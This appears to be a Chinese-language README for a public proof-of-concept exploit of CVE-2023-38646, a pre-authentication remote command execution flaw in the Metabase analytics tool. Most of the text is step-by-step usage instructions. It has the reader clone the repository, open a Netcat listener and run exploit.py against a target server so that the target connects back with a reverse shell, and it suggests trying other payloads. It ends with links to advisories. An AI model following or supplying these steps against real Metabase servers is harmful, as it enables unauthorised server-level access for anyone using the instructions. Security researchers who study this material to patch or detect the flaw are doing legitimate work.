这是一个用于利用 Metabase(一款开源商业智能和数据分析工具)的概念验证(PoC)脚本。Metabase 允许用户可视化并交互式地处理其数据,使其成为强大的数据分析平台。
该漏洞编号为 CVE-2023-38646,允许攻击者在无需任何身份验证的情况下在服务器上执行任意命令。此缺陷的影响十分严重,因为它以服务器的特权级别授予了对服务器的未授权访问权限。
克隆此仓库
git clone https://github.com/threatHNTR/CVE-2023-38646.git
进入仓库目录
cd CVE-2023-38646
在运行脚本之前,设置一个 Netcat 监听器
nc -nlvp chosen-port
运行脚本
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
漏洞利用:该脚本将尝试向目标 Metabase 服务器发送一个反弹 shell。如果成功,你将在自己的机器上收到一个 shell。你可以随意更改 payload 以尝试不同的反弹 shell。
GitHub 安全公告:https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Metabase 安全公告:https://www.metabase.com/blog/security-advisory
Metabase GitHub 仓库:https://github.com/metabase/metabase
Assetnote 博客 - 链式利用实现 Metabase 预认证 RCE:https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/